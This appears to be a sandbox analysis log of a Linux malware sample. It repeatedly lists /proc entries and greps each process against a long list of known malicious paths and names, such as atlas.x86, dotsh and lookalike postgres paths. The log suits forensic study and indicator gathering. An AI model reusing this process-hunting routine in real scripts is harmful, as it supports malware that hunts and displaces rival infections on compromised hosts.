/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:832
-
-
/bin/grepgrep exe2⤵PID:835
-
-
/bin/lsls -latrh /proc/202⤵PID:834
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:837
-
-
/bin/grepgrep exe2⤵PID:840
-
-
/bin/lsls -latrh /proc/212⤵PID:839
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:842
-
-
/bin/grepgrep exe2⤵PID:845
-
-
/bin/lsls -latrh /proc/222⤵PID:844
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:847
-
-
/bin/grepgrep exe2⤵PID:850
-
-
/bin/lsls -latrh /proc/232⤵PID:849
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:852
-
-
/bin/grepgrep exe2⤵PID:855
-
-
/bin/lsls -latrh /proc/2382⤵PID:854
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:857
-
-
/bin/grepgrep exe2⤵PID:860
-
-
/bin/lsls -latrh /proc/242⤵PID:859
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:862
-
-
/bin/grepgrep exe2⤵PID:865
-
-
/bin/lsls -latrh /proc/32⤵PID:864
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:867
-
-
/bin/grepgrep exe2⤵PID:870
-
-
/bin/lsls -latrh /proc/3262⤵PID:869
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:872
-
-
/bin/grepgrep exe2⤵PID:875
-
-
/bin/lsls -latrh /proc/3272⤵PID:874
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:877
-
-
/bin/grepgrep exe2⤵PID:880
-
-
/bin/lsls -latrh /proc/3492⤵PID:879
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:882
-
-
/bin/grepgrep exe2⤵PID:885
-
-
/bin/lsls -latrh /proc/3502⤵PID:884
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:887
-
-
/bin/grepgrep exe2⤵PID:890
-
-
/bin/lsls -latrh /proc/3532⤵PID:889
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:892
-
-
/bin/lsls -latrh /proc/362⤵PID:894
-
-
/bin/grepgrep exe2⤵PID:895
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:897
-
-
/bin/grepgrep exe2⤵PID:900
-
-
/bin/lsls -latrh /proc/372⤵PID:899
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:902
-
-
/bin/grepgrep exe2⤵PID:905
-
-
/bin/lsls -latrh /proc/3782⤵PID:904
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:907
-
-
/bin/grepgrep exe2⤵PID:910
-
-
/bin/lsls -latrh /proc/3792⤵PID:909
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:912
-
-
/bin/grepgrep exe2⤵PID:915
-
-
/bin/lsls -latrh /proc/3842⤵PID:914
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:917
-
-
/bin/grepgrep exe2⤵PID:920
-
-
/bin/lsls -latrh /proc/42⤵PID:919
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:922
-
-
/bin/grepgrep exe2⤵PID:925
-
-
/bin/lsls -latrh /proc/4402⤵PID:924
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:927
-
-
/bin/grepgrep exe2⤵PID:930
-
-
/bin/lsls -latrh /proc/52⤵PID:929
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:934
-
-
/bin/grepgrep exe2⤵PID:937
-
-
/bin/lsls -latrh /proc/62⤵PID:936
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:939
-
-
/bin/grepgrep exe2⤵PID:943
-
-
/bin/lsls -latrh /proc/6702⤵PID:942
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:946
-
-
/bin/grepgrep exe2⤵PID:950
-
-
/bin/lsls -latrh /proc/6742⤵PID:949
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:953
-
-
/bin/grepgrep exe2⤵PID:957
-
-
/bin/lsls -latrh /proc/6762⤵PID:956
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:960
-
-
/bin/grepgrep exe2⤵PID:964
-
-
/bin/lsls -latrh /proc/6792⤵PID:963
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:967
-
-
/bin/grepgrep exe2⤵PID:970
-
-
/bin/lsls -latrh /proc/6812⤵PID:969
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:974
-
-
/bin/grepgrep exe2⤵PID:977
-
-
/bin/lsls -latrh /proc/692⤵PID:976
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:980
-
-
/bin/lsls -latrh /proc/72⤵PID:983
-
-
/bin/grepgrep exe2⤵PID:984
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:987
-
-
/bin/grepgrep exe2⤵PID:991
-
-
/bin/lsls -latrh /proc/702⤵PID:990
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:993
-
-
/bin/grepgrep exe2⤵PID:997
-
-
/bin/lsls -latrh /proc/7002⤵PID:996
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1000
-
-
/bin/grepgrep exe2⤵PID:1004
-
-
/bin/lsls -latrh /proc/7012⤵PID:1003
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1007
-
-
/bin/grepgrep exe2⤵PID:1010
-
-
/bin/lsls -latrh /proc/7052⤵PID:1009
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1014
-
-
/bin/grepgrep exe2⤵PID:1018
-
-
/bin/lsls -latrh /proc/7062⤵PID:1017
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1021
-
-
/bin/grepgrep exe2⤵PID:1024
-
-
/bin/lsls -latrh /proc/7072⤵PID:1023
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1028
-
-
/bin/grepgrep exe2⤵PID:1031
-
-
/bin/lsls -latrh /proc/712⤵PID:1030
-
-
